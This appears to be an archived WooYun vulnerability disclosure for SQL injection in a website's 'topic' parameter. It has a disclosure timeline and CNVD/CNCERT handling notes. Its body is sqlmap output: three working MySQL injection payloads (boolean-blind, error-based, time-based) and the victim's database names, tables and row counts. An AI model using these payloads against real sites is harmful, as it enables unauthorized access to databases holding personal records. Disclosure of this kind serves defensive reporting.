乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-05: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
rt
http://**.**.**.**/index/list?topic=0&sortid=13
sqlmap resumed the following injection point(s) from stored session:---Parameter: topic (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: topic=0 RLIKE (SELECT (CASE WHEN (3524=3524) THEN 0 ELSE 0x28 END))&sortid=13 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: topic=0 AND (SELECT 4243 FROM(SELECT COUNT(*),CONCAT(0x716a6a6271,(SELECT (ELT(4243=4243,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sortid=13 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: topic=0 AND (SELECT * FROM (SELECT(SLEEP(5)))GWIX)&sortid=13---[12:52:16] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.12, PHP 5.4.13, Nginxback-end DBMS: MySQL 5.0[12:52:16] [INFO] fetching database names[12:52:16] [INFO] the SQL query used returns 12 entries[12:52:16] [INFO] resumed: information_schema[12:52:16] [INFO] resumed: ankang_bbs[12:52:16] [INFO] resumed: ankang_cms[12:52:16] [INFO] resumed: ankang_ucent[12:52:16] [INFO] resumed: app_jbw[12:52:16] [INFO] resumed: kim_appadmin[12:52:16] [INFO] resumed: kim_appcms[12:52:16] [INFO] resumed: mysql[12:52:16] [INFO] resumed: openfire[12:52:16] [INFO] resumed: performance_schema[12:52:16] [INFO] resumed: platform[12:52:16] [INFO] resumed: testavailable databases [12]:[*] ankang_bbs[*] ankang_cms[*] ankang_ucent[*] app_jbw[*] information_schema[*] kim_appadmin[*] kim_appcms[*] mysql[*] openfire[*] performance_schema[*] platform[*] test
Database: test+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| pro_security_student_signin | 600086 || pro_security_define | 38408 || pro_security_class_signin | 30197 || task_log | 21320 || pro_security_laws | 14378 || pro_security_class_check | 12642 || food_col | 6583 || pro_security_roles | 5079 || pro_security_student | 4105 || actionlog | 4095 || china | 3331 || pro_security_ohs | 3219 || user_bs | 2835 || pro_security_role_user | 1117 || food_main | 849 || pro_security_user | 691 || app_organization | 531 || app_tokens | 368 || app_db_config | 354 || app_setup_log | 344 || app_repos | 309 || task | 299 || deploy_rj | 182 || pro_security_accidentevent | 145 || user_limit | 65 || pro_security_define_type | 30 || message | 26 || `user` | 17 || app_info | 17 || app_infos | 15 || app_match_rules | 15 || expired_rules | 15 || customer_appid | 13 || product_cate | 6 || cloud_token | 3 || customer | 3 || admin | 2 || config | 2 || product | 2 || product_versions | 2 || app_info_field | 1 || bug66124 | 1 || roles | 1 || site | 1 || user_old | 1 |+-----------------------------+---------+
Database: kim_appadmin+-----------------+---------+| Table | Entries |+-----------------+---------+| sign | 358942 || log | 37669 || message | 13827 || dietarytmp | 11667 || messagelist | 9545 || `user` | 5185 || userinfo | 5185 || role | 4603 || sms | 524 || class | 523 || area | 432 || weather | 207 || school | 174 || messageconfirm | 111 || push_rel | 30 || remindlist | 13 || finance | 6 || addressbooktype | 2 || feedback | 1 |+-----------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2016-01-08 20:06
CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.
暂无
